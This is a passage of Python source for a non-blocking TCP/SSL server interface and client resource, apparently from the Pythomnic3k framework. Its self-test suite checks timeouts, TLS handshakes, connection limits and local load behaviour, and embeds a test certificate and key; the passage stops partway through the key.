rs.append(r_socket)
except (select_error, ValueError):
discard_socket(r_socket, "select failure")
continue # for
ws = []
for w_socket in w_sockets[:]: # need to create a copy of w_sockets
try:
if select([], [w_socket], [], 0.0)[1]:
ws.append(w_socket)
except (select_error, ValueError):
discard_socket(w_socket, "select failure")
continue # for
if rs or ws:
return rs, ws
else:
return [], []
# this function passes control to the given socket's connection,
# then dispatches it to the appropriate wait list
def process_socket(socket, sockets = None):
try:
connection = connections.get(socket)
if not connection: # must have already been discarded
return
wait_state = connection.process()
if wait_state == "read":
if sockets is w_sockets:
w_sockets.remove(socket)
if sockets is not r_sockets:
r_sockets.append(socket)
elif wait_state == "write":
if sockets is r_sockets:
r_sockets.remove(socket)
if sockets is not w_sockets:
w_sockets.append(socket)
elif wait_state == "enqueue":
if sockets is not None:
sockets.remove(socket)
if self._ceased.is_set():
discard_socket(socket, "interface shutdown")
else:
self._enqueue_request(connection.request,
self.wu_process_tcp_request,
(socket, connection), {})
elif wait_state == "close":
discard_socket(socket)
else:
assert False, "invalid wait state"
except:
discard_socket(socket, exc_string())
# this function creates a connection for a newly accepted
# socket and puts it to the appropriate wait list
def create_connection(socket):
if len(connections) < self._max_connections:
try:
connection = self._connection_factory(socket)
socket = connection.socket # this may be not the original TCP socket
connections[socket] = connection
process_socket(socket) # this does the appropriate initial dispatch
except:
discard_socket(socket, exc_string())
else:
discard_socket(socket, "too many connections")
# this function puts the socket for the processed
# request to the appropriate wait list
def reuse_connection(socket):
try:
process_socket(socket) # this does the appropriate dispatch upon resume
except:
discard_socket(socket, exc_string())
# this function reads and discards all UDP packets
# received and buffered on the pulse socket
def drain_pulse_socket():
while select([self._pulse_recv], [], [], 0.0)[0]:
try:
assert self._pulse_recv.recv(1) == b"\x00"
except:
pmnc.log.error(exc_string()) # log and ignore
# this thread multiplexes all the I/O on all the client sockets
while not current_thread().stopped(): # lifetime loop
try:
discard_expired_sockets()
if self._ceased.is_set() and not idle_sockets_discarded:
discard_idle_sockets()
# select the sockets which are ready for I/O and process them
readable_sockets, writable_sockets = select_rw_sockets(Timeout(1.0))
for r_socket in readable_sockets:
if r_socket is self._pulse_recv: # special case
drain_pulse_socket()
else:
process_socket(r_socket, r_sockets)
for w_socket in writable_sockets:
process_socket(w_socket, w_sockets)
# check for new incoming sockets from the queue
u_socket, mode = self._socket_queue.pop(0.0) or (None, None)
while u_socket:
try:
if mode == "create":
create_connection(u_socket)
elif mode == "reuse":
reuse_connection(u_socket)
else:
discard_socket(u_socket, mode)
except:
discard_socket(u_socket, exc_string())
u_socket, mode = self._socket_queue.pop(0.0) or (None, None)
except:
pmnc.log.error(exc_string()) # log and ignore
# discard the remaining sockets
for socket, connection in list(connections.items()): # need to create a copy of connections
discard_socket(socket, "interface shutdown")
###################################
# by default requests are enqueued to the main thread pool,
# but this method can be overridden to use a different pool,
# as is done by the RPC interface, for example
def _enqueue_request(self, *args, **kwargs):
pmnc.interfaces.enqueue(*args, **kwargs)
###################################
def _create_random_server_socket(self) -> socket:
# negative port specifies random port range, for example -12000 means 12000-12999
server_address, base_random_port = self._listener_address
low_port = -base_random_port
for scale in (10000, 1000, 100, 10, 1):
if low_port % scale == 0:
high_port = low_port + scale
break
ports = list(range(low_port, high_port))
shuffle(ports)
for port in ports:
server_socket = socket(AF_INET, SOCK_STREAM)
try:
server_socket.bind((server_address, port)) # note the absence of SO_REUSEADDR
except socket_error:
server_socket.close()
else:
return server_socket
else:
raise Exception("ran out of possible bind ports")
###################################
def _create_static_server_socket(self) -> socket:
server_socket = socket(AF_INET, SOCK_STREAM)
try:
server_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
server_socket.bind(self._listener_address)
except:
server_socket.close()
raise
else:
return server_socket
###################################
def _listener_proc(self, started_listening):
# bind the socket and start listening
try:
server_port = self._listener_address[1]
if server_port >= 0:
server_socket = self._create_static_server_socket()
else:
server_socket = self._create_random_server_socket()
self._listener_address = server_socket.getsockname()
server_socket.listen(256)
except:
pmnc.log.error(exc_string())
return
try:
started_listening.set()
pmnc.log.message("started listening for connections at {0[0]:s}:{0[1]:d}".\
format(self._listener_address))
# this thread keeps accepting incoming connections and
# pushing the new sockets to the i/o thread's queue
while not current_thread().stopped(): # lifetime loop
try:
if select([server_socket], [], [], 1.0)[0]:
client_socket, client_address = server_socket.accept()
if pmnc.log.debug:
pmnc.log.debug("incoming connection from {0[0]:s}:{0[1]:d}".\
format(client_address))
client_socket.setblocking(False)
self._push_socket_wake_io(client_socket, "create")
except:
pmnc.log.error(exc_string()) # log and ignore
finally:
server_socket.close()
pmnc.log.message("stopped listening")
###############################################################################
class TcpResource: # called such so as not to be confused with "real" Resource's
"""
<TcpResource>
This is a generic facility for implementing client protocol sides
over TCP or SSL. In the course of sending or receiving data this class
respects the request timeout and is not blocking.
"""
@typecheck
def __init__(self,
name: str,
*,
server_address: (str, int),
connect_timeout: float,
ssl_key_cert_file: optional(os_path.isfile),
ssl_ca_cert_file: optional(os_path.isfile),
ssl_ciphers: optional(str),
ssl_protocol: optional(one_of("SSLv23", "TLSv1", "TLSv1_1", "TLSv1_2", "TLS")),
ssl_server_hostname: optional(str),
ssl_ignore_hostname: optional(bool)):
self._name = name
self._server_address = server_address
self._connect_timeout = connect_timeout
assert ssl_key_cert_file is None or os_path.isfile(ssl_ca_cert_file), \
"CA certificate file must be specified"
self._ssl_key_cert_file = ssl_key_cert_file
self._ssl_ca_cert_file = ssl_ca_cert_file
self._ssl_ciphers = ssl_ciphers
self._ssl_protocol = ssl_protocol
self._ssl_server_hostname = ssl_server_hostname
self._ssl_ignore_hostname = ssl_ignore_hostname
self._use_ssl = ssl_ca_cert_file is not None
self._peer_cn = None
self._server_info = "{0:s} {1:s}://{2[0]:s}:{2[1]:d}".\
format(self._name, self._use_ssl and "ssl" or "tcp",
self._server_address)
name = property(lambda self: self._name)
encrypted = property(lambda self: self._use_ssl)
peer_cn = property(lambda self: self._peer_cn)
server_info = property(lambda self: self._server_info)
###################################
# TCP-specific send/recv
def _tcp_send(self, data):
if not select([], [self._socket], [], pmnc.request.remain)[1]:
raise Exception("request deadline writing data to {0:s}".format(self._server_info))
return self._socket.send(data)
def _tcp_recv(self, n):
if not select([self._socket], [], [], pmnc.request.remain)[0]:
raise Exception("request deadline reading data from {0:s}".format(self._server_info))
return self._socket.recv(n)
###################################
# SSL-specific send/recv
def _ssl_retry(self, label, timeout, f):
while not timeout.expired:
try:
return f()
except SSLError as e:
if e.args[0] == SSL_ERROR_WANT_READ:
select([self._socket], [], [], timeout.remain)
elif e.args[0] == SSL_ERROR_WANT_WRITE:
select([], [self._socket], [], timeout.remain)
else:
raise
else:
raise Exception("request deadline {0:s} {1:s}".\
format(label, self._server_info))
def _ssl_send(self, data):
return self._ssl_retry("writing data to", pmnc.request,
lambda: self._socket.write(data))
def _ssl_recv(self, n):
return self._ssl_retry("reading data from", pmnc.request,
lambda: self._socket.read(n))
###################################
def connect(self):
if self._ssl_server_hostname is not None:
ssl_server_hostname = self._ssl_server_hostname
sni_suffix = "/sni={0:s}".format(ssl_server_hostname)
else:
ssl_server_hostname = self._server_address[0]
sni_suffix = ""
if pmnc.log.debug:
pmnc.log.debug("connecting to {0:s}{1:s}".format(self._server_info, sni_suffix))
try:
self._socket = socket(AF_INET, SOCK_STREAM)
try:
# establish TCP connection within connect_timeout
# or request timeout whichever is smaller
timeout = Timeout(min(self._connect_timeout, pmnc.request.remain))
self._socket.settimeout(timeout.remain or 0.01)
self._socket.connect(self._server_address)
self._socket.setblocking(False)
if self._use_ssl: # perform SSL handshake
self._socket.getpeername() # fixme - remove, see http://bugs.python.org/issue4171
self._tcp_socket = self._socket
self._socket = _wrap_socket(self._tcp_socket,
server_side = False,
keyfile = self._ssl_key_cert_file,
certfile = self._ssl_key_cert_file,
ca_certs = self._ssl_ca_cert_file,
ssl_ciphers = self._ssl_ciphers,
ssl_protocol = self._ssl_protocol,
ssl_server_hostname = ssl_server_hostname,
ssl_ignore_hostname = self._ssl_ignore_hostname,
cert_reqs = CERT_REQUIRED)
self._socket.setblocking(False)
# perform asynchronous handshake within the rest of connect_timeout
self._ssl_retry("waiting for handshake with", timeout, self._socket.do_handshake)
# extract peer's certificate info, there has to be one, because we use CERT_REQUIRED
self._peer_cn = _peer_cn(self._socket)
self._server_info = "{0:s} ssl://{1[0]:s}:{1[1]:d}/cn={2:s}".\
format(self._name, self._server_address, self._peer_cn)
# select appropriate send/recv methods
self._send = self._ssl_send
self._recv = self._ssl_recv
else:
self._send = self._tcp_send
self._recv = self._tcp_recv
except:
self._socket.close()
raise
except:
pmnc.log.error("connection to {0:s}{1:s} failed: {2:s}".\
format(self._server_info, sni_suffix, exc_string()))
raise
else:
if pmnc.log.debug:
pmnc.log.debug("connected to {0:s}".format(self._server_info))
###################################
def send_request(self, request: bytes, response_handler: optional(callable) = None):
if request:
if pmnc.log.debug:
pmnc.log.debug("sending {0:d} byte(s) to {1:s}".\
format(len(request), self._server_info))
# send request, occasionally timing out
request = BytesIO(request)
data = request.read(16384)
while data:
sent = self._send(data)
if sent == 0:
raise Exception("unexpected eof writing data to {0:s}".\
format(self._server_info))
unsent = len(data) - sent
if unsent > 0:
request.seek(-unsent, SEEK_CUR)
data = request.read(16384)
if response_handler is None:
return None
if pmnc.log.debug:
pmnc.log.debug("waiting for response from {0:s}".format(self._server_info))
# receive response, occasionally timing out
response_length = 0
while True:
data = self._recv(16384)
response_length += len(data)
response = response_handler(data) # notify response handler before checking for eof,
if response is not None: # because eof may be legitimate at this time
break
if not data:
raise Exception("unexpected eof reading data from {0:s}".\
format(self._server_info))
if pmnc.log.debug:
pmnc.log.debug("received {0:d} byte(s) from {1:s}".\
format(response_length, self._server_info))
return response
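        # note: a response_handler passed to this method is expected to accumulate
        # the chunks it is given and return the complete response once it can
        # recognize one (or None to keep reading); see loopback_handler in
        # self_test below for a minimal example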
###################################
def disconnect(self):
try:
if pmnc.log.debug:
pmnc.log.debug("disconnecting from {0:s}".format(self._server_info))
self._socket.close()
except:
pmnc.log.error(exc_string()) # log and ignore
###############################################################################
def self_test():
from time import time, sleep
from random import random, randint
from threading import Thread
from os import urandom
from pmnc.request import fake_request
request_timeout = pmnc.config_interfaces.get("request_timeout")
max_connections = pmnc.config_interfaces.get("thread_count") * 2
###################################
def test_interface(ssl_key_cert_file, ssl_ca_cert_file, ssl_ciphers, ssl_protocol):
###############################
def start_interface(handler_factory, **kwargs):
kwargs.setdefault("listener_address", ("127.0.0.1", 0))
kwargs.setdefault("max_connections", max_connections)
kwargs.setdefault("ssl_key_cert_file", ssl_key_cert_file)
kwargs.setdefault("ssl_ca_cert_file", ssl_ca_cert_file)
kwargs.setdefault("ssl_ciphers", ssl_ciphers)
kwargs.setdefault("ssl_protocol", ssl_protocol)
ifc = TcpInterface("test", handler_factory, request_timeout, **kwargs)
ifc.start()
return ifc
###############################
def connect_to(ifc): # blocking connect
s = socket(AF_INET, SOCK_STREAM)
s.connect(ifc.listener_address)
if ssl_key_cert_file:
s = _wrap_socket(s, ca_certs = ssl_ca_cert_file,
ssl_protocol = ssl_protocol,
ssl_ciphers = ssl_ciphers,
ssl_server_hostname = None,
ssl_ignore_hostname = True,
cert_reqs = CERT_REQUIRED)
try:
s.do_handshake()
except:
pmnc.log.error(exc_string())
return s
###############################
def drain_socket(socket, timeout):
t = Timeout(timeout)
if select([socket], [], [], t.remain)[0]:
result = b""
while True:
try:
result += socket.recv(1024)
except:
pmnc.log.error(exc_string())
break
else:
if t.expired or not select([socket], [], [], t.remain)[0]:
break
return result
else:
return None
###############################
def peer_drops_connection(socket, timeout):
t = Timeout(timeout)
while not t.expired:
if drain_socket(socket, 0.1) == b"":
return True
return False
###############################
class NullParser:
def __init__(self, prev_handler):
pass
###############################
class LineEchoParser:
protocol = "line_echo"
def __init__(self, prev_handler):
self._data = b""
def consume(self, data):
self._data += data
if self._data.endswith(b"\n"):
return True
def process_tcp_request(self):
self._response = BytesIO(self._data)
del self._data # as this is a one-request handler
def produce(self, n):
return self._response.read(n)
def retract(self, n):
self._response.seek(-n, SEEK_CUR)
idle_timeout = 5.0
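        # LineEchoParser illustrates the handler contract exercised by these tests:
        # consume(data) returns a true value once a complete request has been
        # received, process_tcp_request() prepares the response, and
        # produce(n)/retract(n) stream it back; idle_timeout allows the
        # connection to be kept alive between requests.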
###############################
pmnc.log.message("****************** START/STOP ******************")
def test_start_stop():
ifc = start_interface(NullParser)
try:
assert ifc.listener_address[0] == "127.0.0.1"
sleep(2.0) # to let the threads run
finally:
ifc.cease(); ifc.stop()
test_start_stop()
###############################
pmnc.log.message("****************** START/STOP RANDOM PORT ******************")
def test_start_stop_random_port():
ifc = start_interface(NullParser, listener_address = ("127.0.0.1", -54300))
try:
assert ifc.listener_address[0] == "127.0.0.1"
assert 54300 <= ifc.listener_address[1] < 54400
sleep(2.0) # to let the threads run
finally:
ifc.cease(); ifc.stop()
test_start_stop_random_port()
###############################
pmnc.log.message("****************** CONNECT/DISCONNECT ******************")
def test_connect_disconnect():
ifc = start_interface(NullParser)
try:
s = connect_to(ifc)
sleep(2.0)
s.close()
finally:
ifc.cease(); ifc.stop()
test_connect_disconnect()
###############################
pmnc.log.message("****************** CONNECTION LIMIT ******************")
def test_max_connections():
ifc = start_interface(NullParser)
try:
ss = []
for i in range(max_connections):
ss.append(connect_to(ifc))
sleep(0.1)
for s in ss:
assert not peer_drops_connection(s, 0.1)
s = connect_to(ifc)
assert peer_drops_connection(s, 1.0)
finally:
ifc.cease(); ifc.stop()
test_max_connections()
###############################
pmnc.log.message("****************** SIMPLE REQUEST/RESPONSE TEST ******************")
def test_process_request_response():
ifc = start_interface(LineEchoParser)
try:
s = connect_to(ifc)
r = s.makefile("rb")
for i in range(1, 19):
data = urandom(randint(2 ** (i - 1), 2 ** i)).\
replace(b"\n", b" ").replace(b"\r", b" ").replace(b"\x00", b" ") + b"\n"
s.sendall(data)
resp = r.readline()
assert resp == data
finally:
ifc.cease(); ifc.stop()
test_process_request_response()
###############################
pmnc.log.message("****************** LOOPBACK CONNECTION FAILURE TEST ******************")
def test_loopback_connection_failure():
ifc = start_interface(LineEchoParser)
try:
fake_request(10.0)
r = pmnc.protocol_tcp.TcpResource("tres", server_address = ("1.2.3.4", 1234),
connect_timeout = 3.0,
ssl_key_cert_file = ifc._ssl_key_cert_file,
ssl_ca_cert_file = ifc._ssl_ca_cert_file,
ssl_ciphers = ifc._ssl_ciphers,
ssl_protocol = ifc._ssl_protocol,
ssl_server_hostname = None,
ssl_ignore_hostname = True)
try:
r.connect()
except:
pmnc.log.error(exc_string())
else:
assert False, "shouldn't be able to connect"
finally:
ifc.cease(); ifc.stop()
test_loopback_connection_failure()
###############################
def test_res(ifc, r):
assert r.encrypted == (ifc._ssl_key_cert_file is not None)
assert r.peer_cn is None
r.connect()
try:
assert r.encrypted == (ifc._ssl_key_cert_file is not None)
if r.encrypted:
assert r.peer_cn is not None
response = b""
def loopback_handler(b):
nonlocal response
response += b
if response.endswith(b"\n"):
return response
for i in range(1, 19):
data = urandom(randint(2 ** (i - 1), 2 ** i)).\
replace(b"\n", b" ").replace(b"\r", b" ").replace(b"\x00", b" ") + b"\n"
response = b""
assert r.send_request(data, loopback_handler) == data
finally:
r.disconnect()
###############################
pmnc.log.message("****************** LOOPBACK 1-WAY TEST ******************")
def test_loopback_1way():
ifc = start_interface(LineEchoParser)
try:
fake_request(10.0)
r = pmnc.protocol_tcp.TcpResource("tres", server_address = ifc.listener_address,
connect_timeout = 3.0,
ssl_key_cert_file = None,
ssl_ca_cert_file = ifc._ssl_ca_cert_file,
ssl_ciphers = ifc._ssl_ciphers,
ssl_protocol = ifc._ssl_protocol,
ssl_server_hostname = None,
ssl_ignore_hostname = True)
test_res(ifc, r)
finally:
ifc.cease(); ifc.stop()
test_loopback_1way()
###############################
pmnc.log.message("****************** LOOPBACK 2-WAY TEST ******************")
def test_loopback_2way():
ifc = start_interface(LineEchoParser, required_auth_level = CERT_REQUIRED)
try:
fake_request(10.0)
if ifc.encrypted:
r = pmnc.protocol_tcp.TcpResource("tres", server_address = ifc.listener_address,
connect_timeout = 3.0,
ssl_key_cert_file = None,
ssl_ca_cert_file = ifc._ssl_ca_cert_file,
ssl_ciphers = ifc._ssl_ciphers,
ssl_protocol = ifc._ssl_protocol,
ssl_server_hostname = None,
ssl_ignore_hostname = True)
try:
r.connect()
except Exception as e:
assert "HANDSHAKE_FAILURE" in str(e)
else:
assert False, "shouldn't be able to connect without a client certificate"
r = pmnc.protocol_tcp.TcpResource("tres", server_address = ifc.listener_address,
connect_timeout = 3.0,
ssl_key_cert_file = ifc._ssl_key_cert_file,
ssl_ca_cert_file = ifc._ssl_ca_cert_file,
ssl_ciphers = ifc._ssl_ciphers,
ssl_protocol = ifc._ssl_protocol,
ssl_server_hostname = None,
ssl_ignore_hostname = True)
test_res(ifc, r)
finally:
ifc.cease(); ifc.stop()
test_loopback_2way()
###############################
pmnc.log.message("****************** LOOPBACK INCOMPATIBLE PROTOCOLS ******************")
def test_loopback_protocols():
ifc = start_interface(LineEchoParser, ssl_protocol = "TLSv1_1")
try:
fake_request(10.0)
s = socket(AF_INET, SOCK_STREAM)
s.connect(ifc.listener_address)
s = _wrap_socket(s, ca_certs = ifc._ssl_ca_cert_file,
ssl_ciphers = ssl_ciphers,
ssl_protocol = "TLSv1_2",
ssl_server_hostname = None,
ssl_ignore_hostname = True,
cert_reqs = CERT_OPTIONAL)
try:
s.do_handshake()
except Exception as e:
assert "VERSION" in str(e)
else:
assert False, "shouldn't be able to connect over incompatible protocol"
s.close()
s = socket(AF_INET, SOCK_STREAM)
s.connect(ifc.listener_address)
s = _wrap_socket(s, ca_certs = ifc._ssl_ca_cert_file,
ssl_ciphers = ssl_ciphers,
ssl_protocol = "TLSv1_1",
ssl_server_hostname = None,
ssl_ignore_hostname = True,
cert_reqs = CERT_OPTIONAL)
s.do_handshake()
s.close()
finally:
ifc.cease(); ifc.stop()
if ssl_protocol:
test_loopback_protocols()
###############################
pmnc.log.message("****************** SIMPLE HOSTNAME MISMATCH ******************")
def test_simple_hostname_mismatch():
ifc = start_interface(LineEchoParser)
try:
fake_request(10.0)
r = pmnc.protocol_tcp.TcpResource("tres", server_address = ("localhost", ifc.listener_address[1]),
connect_timeout = 3.0,
ssl_key_cert_file = ifc._ssl_key_cert_file,
ssl_ca_cert_file = ifc._ssl_ca_cert_file,
ssl_ciphers = ifc._ssl_ciphers,
ssl_protocol = ifc._ssl_protocol,
ssl_server_hostname = None,
ssl_ignore_hostname = False)
try:
r.connect()
except Exception as e:
assert "match" in str(e) and "localhost" in str(e)
else:
assert False, "shouldn't be able to connect"
r = pmnc.protocol_tcp.TcpResource("tres", server_address = ("localhost", ifc.listener_address[1]),
connect_timeout = 3.0,
ssl_key_cert_file = ifc._ssl_key_cert_file,
ssl_ca_cert_file = ifc._ssl_ca_cert_file,
ssl_ciphers = ifc._ssl_ciphers,
ssl_protocol = ifc._ssl_protocol,
ssl_server_hostname = None,
ssl_ignore_hostname = True)
r.connect()
r.disconnect()
finally:
ifc.cease(); ifc.stop()
if ssl_protocol:
test_simple_hostname_mismatch()
###############################
pmnc.log.message("****************** SNI HOSTNAME MISMATCH ******************")
def test_sni_hostname_mismatch():
ifc = start_interface(LineEchoParser, ssl_protocol = "TLSv1_1")
try:
s = socket(AF_INET, SOCK_STREAM)
s.connect(ifc.listener_address)
s = _wrap_socket(s, ca_certs = ifc._ssl_ca_cert_file,
ssl_ciphers = ssl_ciphers,
ssl_protocol = "TLSv1_1",
ssl_server_hostname = "foobar",
ssl_ignore_hostname = False,
cert_reqs = CERT_OPTIONAL)
try:
s.do_handshake()
except Exception as e:
assert "match" in str(e) and "foobar" in str(e)
else:
assert False, "shouldn't be able to connect to a mismatched server"
s.close()
s = socket(AF_INET, SOCK_STREAM)
s.connect(ifc.listener_address)
s = _wrap_socket(s, ca_certs = ifc._ssl_ca_cert_file,
ssl_ciphers = ssl_ciphers,
ssl_protocol = "TLSv1_1",
ssl_server_hostname = "foobar",
ssl_ignore_hostname = True,
cert_reqs = CERT_OPTIONAL)
s.do_handshake()
s.close()
finally:
ifc.cease(); ifc.stop()
if ssl_protocol:
test_sni_hostname_mismatch()
###############################
pmnc.log.message("****************** INITIAL IDLE TIMEOUT ******************")
def test_initial_idle_timeout():
ifc = start_interface(NullParser)
try:
s = connect_to(ifc)
assert not peer_drops_connection(s, request_timeout - 1.0)
assert peer_drops_connection(s, 3.0)
finally:
ifc.cease(); ifc.stop()
test_initial_idle_timeout()
###############################
pmnc.log.message("****************** REQUEST READING TIMEOUT ******************")
def test_read_timeout():
ifc = start_interface(LineEchoParser)
try:
s = connect_to(ifc)
t = Timeout(request_timeout - 1.0)
while not t.expired:
s.sendall(b"x")
sleep(0.1)
assert peer_drops_connection(s, 3.0)
finally:
ifc.cease(); ifc.stop()
test_read_timeout()
###############################
pmnc.log.message("****************** PROCESSING TIMEOUT ******************")
class SlowProcessingLineEchoParser(LineEchoParser):
def process_tcp_request(self):
sleep(request_timeout + 1.0)
self._response = BytesIO(self._data)
def test_process_timeout():
ifc = start_interface(SlowProcessingLineEchoParser)
try:
s = connect_to(ifc)
s.sendall(b"x\n")
assert not peer_drops_connection(s, request_timeout - 1.0)
assert peer_drops_connection(s, 3.0)
finally:
ifc.cease(); ifc.stop()
test_process_timeout()
###############################
pmnc.log.message("****************** PROCESSING ERROR ******************")
        class FailingLineEchoParser(LineEchoParser):
            def process_tcp_request(self):
                raise Exception("processing error")
        def test_process_error():
            ifc = start_interface(FailingLineEchoParser)
try:
s = connect_to(ifc)
s.sendall(b"x\n")
assert peer_drops_connection(s, 1.0)
finally:
ifc.cease(); ifc.stop()
test_process_error()
###############################
pmnc.log.message("****************** RESPONSE WRITING TIMEOUT ******************")
class SlowWritingLineEchoParser(LineEchoParser):
def produce(self, n):
sleep(0.1)
return self._response.read(1)
def test_write_timeout():
ifc = start_interface(SlowWritingLineEchoParser)
try:
s = connect_to(ifc)
t = Timeout(request_timeout - 1.0)
s.sendall(b"x" * 1000 + b"\n")
while t.remain > 1.0:
x = s.recv(10)
assert x == b"x" * len(x)
assert not peer_drops_connection(s, t.remain)
assert peer_drops_connection(s, 4.0)
finally:
ifc.cease(); ifc.stop()
test_write_timeout()
###############################
pmnc.log.message("****************** KEEP-ALIVE TIMEOUT ******************")
def test_reuse_timeout():
ifc = start_interface(LineEchoParser)
try:
s = connect_to(ifc)
s.sendall(b"foo\n")
assert peer_drops_connection(s, 7.0)
finally:
ifc.cease(); ifc.stop()
test_reuse_timeout()
###############################
pmnc.log.message("****************** TWO KEEP-ALIVE TIMEOUTS ******************")
def test_reuse_timeout2():
ifc = start_interface(LineEchoParser)
try:
s = connect_to(ifc)
s.sendall(b"foo\n") # request #1
assert not peer_drops_connection(s, 4.0) # 5.0 - 1.0
s.sendall(b"foo\n") # request #2
assert not peer_drops_connection(s, 4.0)
assert peer_drops_connection(s, 3.0)
finally:
ifc.cease(); ifc.stop()
test_reuse_timeout2()
###############################
pmnc.log.message("****************** STRESS TEST ******************")
class RandomProcessingLineEchoParser(LineEchoParser):
def process_tcp_request(self):
sleep(random() * 0.2)
LineEchoParser.process_tcp_request(self)
def test_stress():
ifc = start_interface(RandomProcessingLineEchoParser)
try:
requests_per_thread = 50
request_count_lock = Lock()
request_count = 0
def th_proc():
s = connect_to(ifc)
r = s.makefile("rb")
for i in range(requests_per_thread):
sleep(random() * 0.2)
data = b"x" * randint(1, 262144) + b"\n"
s.sendall(data)
sleep(random() * 0.2)
assert r.readline() == data
with request_count_lock:
nonlocal request_count
request_count += 1
assert not peer_drops_connection(s, 4.5)
assert peer_drops_connection(s, 4.5)
ths = [ Thread(target = th_proc) for i in range(max_connections) ]
for th in ths: th.start()
for th in ths: th.join()
assert request_count == requests_per_thread * max_connections
finally:
ifc.cease(); ifc.stop()
test_stress()
###############################
pmnc.log.message("****************** LOCKOUT TEST ******************")
class HangingLineEchoParser(LineEchoParser):
def process_tcp_request(self):
if self._data != b"ok\n":
sleep(request_timeout + 1.0)
LineEchoParser.process_tcp_request(self)
def test_lockout():
ifc = start_interface(HangingLineEchoParser)
try:
requests_per_thread = 10
def th_proc():
s = connect_to(ifc)
r = s.makefile("rb")
for i in range(requests_per_thread):
sleep(random())
data = b"x" * randint(1, 262144) + b"\n"
try:
s.sendall(data)
resp = r.readline()
except:
s = connect_to(ifc)
r = s.makefile("rb")
continue
else:
assert resp == b""
ths = [ Thread(target = th_proc) for i in range(max_connections) ]
for th in ths: th.start()
for th in ths: th.join()
sleep(request_timeout) # this makes all the queued requests expire
# and the next request is processed as though nothing happened
start = time()
s = connect_to(ifc)
r = s.makefile("rb")
data = b"ok\n"
s.sendall(data)
assert r.readline() == data
assert time() - start < 1.0
finally:
ifc.cease(); ifc.stop()
test_lockout()
###############################
pmnc.log.message("****************** DOS TEST ******************")
class SlowLineEchoParser(LineEchoParser):
def process_tcp_request(self):
sleep(request_timeout * random() / 3)
LineEchoParser.process_tcp_request(self)
def test_dos():
ifc = start_interface(SlowLineEchoParser, max_connections = 50)
try:
start = time()
def th_proc():
while time() < start + 60.0:
data = b"x\n"
try:
s = connect_to(ifc)
s.sendall(data)
                            select([s], [], [], 1.0)
except:
pass
ths = [ Thread(target = th_proc) for i in range(50) ]
for th in ths: th.start()
for th in ths: th.join()
sleep(request_timeout) # this makes all the queued requests expire
# and the next request is processed as though nothing happened
start = time()
s = connect_to(ifc)
r = s.makefile("rb")
data = b"x\n"
s.sendall(data)
assert r.readline() == data
assert time() - start < request_timeout / 3.0 + 1.0
finally:
ifc.cease(); ifc.stop()
test_dos()
###################################
# TCP
test_interface(None, None, None, None)
###################################
# SSL
test_ca_cert = """-----BEGIN CERTIFICATE-----
MIIC9TCCAd2gAwIBAgIBADANBgkqhkiG9w0BAQsFADANMQswCQYDVQQDDAJDQTAe
Fw0xOTAxMDEwMDAwMDBaFw0yODEyMzEyMzU5NTlaMA0xCzAJBgNVBAMMAkNBMIIB
IjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxV903JyafnXPL/eVnAd/+eY3
n6yVdqCiwjdq8ijt6+c8pTLb3JmvpkQnVQJ6rwFdF0p/qKa0ghvAkNehzwLSWqMj
56ce6d5/gIsh6PQRZEkcPkVfKvC03IRwvB2ObfQyL7/fAmGWwfiKIBpy/O4qNxcP
nMjCpfmYo3fLIqOZGSRE3BARk5GywcTjWPnVXWbkLdVorwOk5lm5zs98dQh8pu7Q
9V2YA2RvIm/QkXLGDmQc3AdbwM6i1NdexlgwbCdfP3MvtxLqti60woQvhACiV210
ddP7PU07VvxItnw/lYYKkZBybAjrfaNH5TwzjVD6tr18RZX9Hn4z8+dNz4kLqwID
AQABo2AwXjAPBgNVHRMBAf8EBTADAQH/MAsGA1UdDwQEAwIBBjAdBgNVHQ4EFgQU
daB4T0JlwTNT38CZsajeFw9KArUwHwYDVR0jBBgwFoAUdaB4T0JlwTNT38CZsaje
Fw9KArUwDQYJKoZIhvcNAQELBQADggEBADGS7NZe3jHZZtJy2JPScx4R20nHygTW
OKq5q2EYdlClPDj7JjRckJB8GSRcOdo/69tNn/28HxtCe6PKZklNQTKPP21msPu6
Cz+Ey1dEuZlpPDX+3ntxl0cXv02iAolmHKk/9I0AQRrBnFmO7zcC1LjU0w2O9a0t
ijO5kP3/7MM7+jqk/ff94vhSkxqAC8m4V9ypmxBFRKBA9FuiSDnx0KWqNCterpAt
XgyXnpmIGPih3Qq1tS+i7wJGzMVP6YsIKPS0fqqc88LUBmMmibiBlw/oj51JsPeS
scXlhdydmgVokDyHh9asuOi11G5SJdkwJEFChibg6xcmsIfWITgc0ig=
-----END CERTIFICATE-----"""
test_ca_cert_pem = os_path.join(__cage_dir__, "ssl_keys", "test_ca_cert.pem")
with open(test_ca_cert_pem, "w") as f:
f.write(test_ca_cert)
test_key_cert = """-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDKGN8mIQsTwSnw
oP+jF2wJnqx8iW/AbdNWeoPTfz3e9/bZkleuuIdSUiQk15IxCoaSAxhkDnM/Y2A9
9CVGfC/XhJ0C3NZQGQK8HVih93X+/8y6HrHPVyUKTzzEBC0Jnipw7F7bwRRtBno3
r+lji84b4b/I0cMudc/P04fZYivzKSrReS7dr/EhwlF3AAu0Cvyt0ictgZ+dr9rH
mrfHjZLV0H++pNWsCX/Yf23qz0gMZq5HlTaOPteUsyzvS52/TtKignYQwKI20DU1
AO1ltYrryGdOKWU3xEh20wDVkU794/CHTb8GIdtJ2HZ6VnbeCgXofOGB+1fAq1La
cA/GYcopAgMBAAECggEARPxWd+qBoH2odlZOzPo6y9HZKS208ufKY1Ow2iouEYVt
QvmcaqzcrHITmmvnoEvqgb8CvWzdVD705FEJxFSx9Ax1mDuQAIl5EIOn9KnHIoNo
/ANsSM2DfFBt+q8+PHE8JY3aF4OCGHFEmOu4bF2VvpjB4agQyzQ1+shHMCI9xGOm
mHarV1KE9V/fZ6OwSQ0+SuPn9kFvHFVHpyOoS+2Mk2cO7Uasvsx5VX0leQesGSOQ
NVUk0Klyf4rdv8AqlqS7h97Ereh+4NhroV5Dmje6PVJb5VQWmKIDMXetslJnNn9x
74/hBKzZzcJiInmCsf9eTNRPi1nCMBJEAF0o1qvzfQKBgQDvSekXVxU/rYbIylJc
gZSBo1U3rNDLneoJp2WDJtYSU4krsDNU7gNFglt1RJy+50gs9UQVL7ulSy/t/cUh
FrRmnR13H9FHagQcIs2vkKYGYCEsOeLBGWeC8+PRNFgE2K24rQjWoF5aX0lUApMt
